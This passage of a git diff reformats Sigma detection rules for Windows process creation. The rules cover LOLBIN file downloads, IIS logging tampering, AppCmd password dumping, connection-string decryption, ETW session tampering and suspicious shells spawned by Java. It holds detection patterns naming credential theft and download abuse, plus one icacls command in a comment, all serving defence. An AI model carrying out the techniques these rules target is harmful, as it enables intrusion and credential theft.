Channel: Security selection_icacls: - - OriginalFileName: iCACLS.EXE - - NewProcessName|endswith: \icacls.exe - selection_cmd: - CommandLine|contains|all: + - OriginalFileName: iCACLS.EXE + - NewProcessName|endswith: \icacls.exe + selection_cmd: # icacls "C:\Users\admin\AppData\Local\37f92fe8-bcf0-4ee0-b8ba-561f797f5696" /deny *S-1-1-0:(OI)(CI)(DE,DC) + CommandLine|contains|all: - C:\Users\ - /deny - '*S-1-1-0:' diff --git a/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml b/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml index 5e21959f6..fedf52cd7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \IEExec.exe - - OriginalFileName: IEExec.exe + - NewProcessName|endswith: \IEExec.exe + - OriginalFileName: IEExec.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml index 34f015f29..39515c67a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml @@ -1,8 +1,7 @@ title: Disable Windows IIS HTTP Logging id: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e status: test -description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group - 3390 (Bronze Union) +description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:httplogging diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml index 51a15977c..153ffb829 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml @@ -1,8 +1,7 @@ title: Microsoft IIS Service Account Password Dumped id: 2d3cdeec-c0db-45b4-aa86-082f7eb75701 status: test -description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, - being used to list passwords +description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA @@ -21,30 +20,31 @@ detection: EventID: 4688 Channel: Security selection_base_name: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_base_list: - CommandLine|contains: 'list ' + CommandLine|contains: 'list ' selection_standalone: - CommandLine|contains: - - ' /config' + CommandLine|contains: + - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900 - ' /xml' + # We cover the "-" version just in case :) - ' -config' - ' -xml' selection_cmd_flags: - CommandLine|contains: - - ' /@t' + CommandLine|contains: + - ' /@t' # Covers both "/@text:*" and "/@t:*" - ' /text' - ' /show' + # We cover the "-" version just in case :) - ' -@t' - ' -text' - ' -show' selection_cmd_grep: - CommandLine|contains: + CommandLine|contains: - :\* - password - condition: process_creation and (all of selection_base_* and (selection_standalone - or all of selection_cmd_*)) + condition: process_creation and (all of selection_base_* and (selection_standalone or all of selection_cmd_*)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml index 35d010942..10582f8bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml @@ -19,20 +19,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - install - module - CommandLine|contains: + CommandLine|contains: - '/name:' - '-name:' filter_iis_setup: ParentProcessName: C:\Windows\System32\inetsrv\iissetup.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Unknown as it may vary from organisation to organisation how admins use to install - IIS modules + - Unknown as it may vary from organisation to organisation how admins use to install IIS modules level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml index eb842a0f4..6959d3958 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml @@ -1,9 +1,7 @@ title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd id: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 status: test -description: Detects usage of "appcmd" to create new global URL rewrite rules. This - behaviour has been observed being used by threat actors to add new rules so they - can access their webshells. +description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. references: - https://twitter.com/malmoeb/status/1616702107242971144 - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r @@ -19,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:system.webServer/rewrite/globalRules diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml b/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml index 8366c3fa8..12e14a70d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml @@ -1,10 +1,7 @@ title: Microsoft IIS Connection Strings Decryption id: 97dbf6e2-e436-44d8-abee-4261b24d3e41 status: test -description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. - An attacker with Microsoft IIS web server access via a webshell or alike can decrypt - and dump any hardcoded connection strings, such as the MSSQL service account password - using aspnet_regiis command. +description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html author: Tim Rauch @@ -21,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_name: - - NewProcessName|endswith: \aspnet_regiis.exe - - OriginalFileName: aspnet_regiis.exe + - NewProcessName|endswith: \aspnet_regiis.exe + - OriginalFileName: aspnet_regiis.exe selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - connectionStrings - ' -pdf' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml b/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml index 6e43d3e72..21c657cbd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml @@ -1,8 +1,7 @@ title: Suspicious IIS Module Registration id: 043c4b8b-3a54-4780-9682-081cb6b8185c status: test -description: Detects a suspicious IIS module registration as described in Microsoft - threat report on IIS backdoors +description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors references: - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ author: Florian Roth (Nextron Systems), Microsoft (idea) @@ -21,12 +20,12 @@ detection: selection_parent: ParentProcessName|endswith: \w3wp.exe selection_cli_1: - CommandLine|contains: appcmd.exe add module + CommandLine|contains: appcmd.exe add module selection_cli_2: - CommandLine|contains: ' system.enterpriseservices.internal.publish' - NewProcessName|endswith: \powershell.exe + CommandLine|contains: ' system.enterpriseservices.internal.publish' + NewProcessName|endswith: \powershell.exe selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - gacutil - ' /I' condition: process_creation and (selection_parent and 1 of selection_cli_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml b/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml index ddc42411d..a9929560a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml +++ b/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml @@ -1,8 +1,7 @@ title: ImagingDevices Unusual Parent/Child Processes id: f11f2808-adb4-46c0-802a-8660db50fa99 status: test -description: Detects unusual parent or children of the ImagingDevices.exe (Windows - Contacts) process as seen being used with Bumblebee activity +description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,13 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe - NewProcessName|endswith: \ImagingDevices.exe + NewProcessName|endswith: \ImagingDevices.exe selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentProcessName|endswith: \ImagingDevices.exe condition: process_creation and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml b/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml index 9664b4e08..075b085c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml @@ -1,8 +1,8 @@ title: Arbitrary File Download Via IMEWDBLD.EXE id: 863218bd-c7d0-4c52-80cd-0a96c09f54af related: - - id: 8d7e392e-9b28-49e1-831d-5949c6281228 - type: derived + - id: 8d7e392e-9b28-49e1-831d-5949c6281228 + type: derived status: experimental description: Detects usage of "IMEWDBLD.exe" to download arbitrary files references: @@ -22,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \IMEWDBLD.exe - - OriginalFileName: imewdbld.exe + - NewProcessName|endswith: \IMEWDBLD.exe + - OriginalFileName: imewdbld.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml b/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml index 7da96d7f2..2f517d6c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml +++ b/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml @@ -1,8 +1,7 @@ title: InfDefaultInstall.exe .inf Execution id: ce7cf472-6fcc-490a-9481-3786840b5d9b status: test -description: Executes SCT script using scrobj.dll from a command in entered into a - specially prepared INF file. +description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution - https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/ @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'InfDefaultInstall.exe ' - '.inf' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml b/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml index 72751bf79..0c1baa8ed 100644 --- a/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml @@ -1,10 +1,8 @@ title: File Download Via InstallUtil.EXE id: 75edd216-1939-4c73-8d61-7f3a0d85b5cc status: test -description: 'Detects use of .NET InstallUtil.exe in order to download arbitrary files. - The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" - - ' +description: | + Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \InstallUtil.exe - - OriginalFileName: InstallUtil.exe + - NewProcessName|endswith: \InstallUtil.exe + - OriginalFileName: InstallUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml b/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml index 5dc2c577a..cf6d46376 100644 --- a/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Execution of InstallUtil Without Log id: d042284c-a296-4988-9be5-f424fadcc28c status: test -description: Uses the .NET InstallUtil.exe application in order to execute image without - log +description: Uses the .NET InstallUtil.exe application in order to execute image without log references: - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '/logfile= ' - /LogToConsole=false - NewProcessName|endswith: \InstallUtil.exe - NewProcessName|contains: Microsoft.NET\Framework + NewProcessName|endswith: \InstallUtil.exe + NewProcessName|contains: Microsoft.NET\Framework condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml index b6ac19258..0480f2d1f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Shells Spawn by Java Utility Keytool id: 90fb5e62-ca1f-4e22-b42e-cc521874c938 status: test -description: Detects suspicious shell spawn from Java utility keytool process (e.g. - adselfservice plus exploitation) +description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) references: - https://redcanary.com/blog/intelligence-insights-december-2021 - https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html @@ -22,7 +21,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \keytool.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \sh.exe - \bash.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml index 692b029f2..222f8ebc9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Child Process Of Manage Engine ServiceDesk id: cea2b7ea-792b-405f-95a1-b903ea06458f status: experimental -description: Detects suspicious child processes of the "Manage Engine ServiceDesk - Plus" Java web service +description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service references: - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py @@ -24,7 +23,7 @@ detection: ParentProcessName|contains|all: - \ManageEngine\ServiceDesk\ - \java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \AppVLP.exe - \bash.exe - \bitsadmin.exe @@ -37,7 +36,7 @@ detection: - \mshta.exe - \net.exe - \net1.exe - - \notepad.exe + - \notepad.exe # Often used in POCs - \powershell.exe - \pwsh.exe - \query.exe @@ -46,12 +45,16 @@ detection: - \scrcons.exe - \sh.exe - \systeminfo.exe - - \whoami.exe + - \whoami.exe # Often used in POCs - \wmic.exe - \wscript.exe + # - '\hh.exe' + # - '\regsvr32.exe' + # - '\rundll32.exe' + # - '\scriptrunner.exe' filter_main_net: - CommandLine|contains: ' stop' - NewProcessName|endswith: + CommandLine|contains: ' stop' + NewProcessName|endswith: - \net.exe - \net1.exe condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml b/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml index 15a339ab0..32cef0f15 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml @@ -1,8 +1,7 @@ title: Java Running with Remote Debugging id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 status: test -description: Detects a JAVA process running with remote debugging allowing more than - just localhost to connect +description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect references: - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp author: Florian Roth (Nextron Systems) @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_jdwp_transport: - CommandLine|contains: transport=dt_socket,address= + CommandLine|contains: transport=dt_socket,address= selection_old_jvm_version: - CommandLine|contains: + CommandLine|contains: - jre1. - jdk1. exclusion: - CommandLine|contains: + CommandLine|contains: - address=127.0.0.1 - address=localhost condition: process_creation and (all of selection_* and not exclusion) diff --git a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml index 60ca5234c..b4e14aa20 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Processes Spawned by Java.EXE id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d related: - - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 - type: similar + - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 + type: similar status: experimental -description: Detects suspicious processes spawned from a Java host process which could - indicate a sign of exploitation (e.g. log4j) +description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) author: Andreas Hunkeler (@Karneades), Florian Roth date: 2021/12/17 modified: 2023/11/09 @@ -22,7 +21,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \AppVLP.exe - \bash.exe - \bitsadmin.exe @@ -45,7 +44,7 @@ detection: - \sh.exe - \systeminfo.exe - \whoami.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml index 86cd41a23..d3bc4a88e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml @@ -1,11 +1,10 @@ title: Shell Process Spawned by Java.EXE id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 related: - - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d - type: similar + - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d + type: similar status: test -description: Detects shell spawned from Java host process, which could be a sign of - exploitation (e.g. log4j exploitation) +description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali date: 2021/12/17 modified: 2023/11/09 @@ -22,12 +21,12 @@ detection: Channel: Security selection: ParentProcessName|endswith: \java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe filter_main_build: - CommandLine|contains: build + CommandLine|contains: build # excluding CI build agents ParentProcessName|contains: build condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml b/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml index 6d243142d..5e9749011 100644 --- a/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml @@ -17,11 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \kd.exe - - OriginalFileName: kd.exe + - NewProcessName|endswith: \kd.exe + - OriginalFileName: kd.exe condition: process_creation and selection falsepositives: - - Rare occasions of legitimate cases where kernel debugging is necessary in production. - Investigation is required + - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml index 680c910a8..4110fff4d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml @@ -1,8 +1,7 @@ title: Computer Password Change Via Ksetup.EXE id: de16d92c-c446-4d53-8938-10aeef41c8b6 status: experimental -description: Detects password change for the computer's domain account or host principal - via "ksetup.exe" +description: Detects password change for the computer's domain account or host principal via "ksetup.exe" references: - https://twitter.com/Oddvarmoe/status/1641712700605513729 - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - NewProcessName|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /setcomputerpassword ' + CommandLine|contains: ' /setcomputerpassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml index 0dce70925..1740b4f02 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml @@ -16,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - NewProcessName|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /ChangePassword ' + CommandLine|contains: ' /ChangePassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml b/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml index 6306ea5ff..78b4dd6b8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml @@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Ldifde.EXE id: 4f7a6757-ff79-46db-9687-66501a02d9ec status: experimental -description: Detects the execution of "ldifde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. references: - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_ldif: - - NewProcessName|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - NewProcessName|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cmd: - CommandLine|contains: -f + CommandLine|contains: -f filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml b/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml index 76e42356d..dbc02555f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml @@ -1,11 +1,8 @@ title: Import LDAP Data Interchange Format File Via Ldifde.EXE id: 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f status: experimental -description: 'Detects the execution of "Ldifde.exe" with the import flag "-i". The - can be abused to include HTTP-based arguments which will allow the arbitrary download - of files from a remote server. - - ' +description: | + Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. references: - https://twitter.com/0gtweet/status/1564968845726580736 - https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html @@ -26,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - NewProcessName|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -i - -f condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml b/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml index bbb2beb56..33ba79366 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml @@ -1,10 +1,7 @@ title: Rebuild Performance Counter Values Via Lodctr.EXE id: cc9d3712-6310-4320-b2df-7cb408274d53 status: experimental -description: Detects the execution of "lodctr.exe" to rebuild the performance counter - registry values. This can be abused by attackers by providing a malicious config - file to overwrite performance counter configuration to confuse and evade monitoring - and security solutions. +description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. references: - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr author: Nasreddine Bencherchali (Nextron Systems) @@ -20,9 +17,9 @@ detection: Channel: Security selection_img: OriginalFileName: LODCTR.EXE - NewProcessName|endswith: \lodctr.exe + NewProcessName|endswith: \lodctr.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /r' - ' -r' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml b/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml index e1690ff1a..6a7924da3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml +++ b/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml @@ -1,8 +1,7 @@ title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE id: cd1f961e-0b96-436b-b7c6-38da4583ec00 status: test -description: Detects the execution of "logman" utility in order to disable or delete - Windows trace sessions +description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions references: - https://twitter.com/0gtweet/status/1359039665232306183?s=21 - https://ss64.com/nt/logman.html @@ -21,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \logman.exe - - OriginalFileName: Logman.exe + - NewProcessName|endswith: \logman.exe + - OriginalFileName: Logman.exe selection_action: - CommandLine|contains: + CommandLine|contains: - 'stop ' - 'delete ' selection_service: - CommandLine|contains: + CommandLine|contains: - Circular Kernel Context Logger - - EventLog- + - EventLog- # Cover multiple traces starting with EventLog-* - SYSMON TRACE - SysmonDnsEtwSession condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml index 166cb9ccb..0fca95eee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml @@ -1,8 +1,7 @@ title: WinDbg/CDB LOLBIN Usage id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2 status: test -description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes - or commands from a debugger script file +description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/ - https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html @@ -24,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cdb.exe - - OriginalFileName: CDB.Exe + - NewProcessName|endswith: 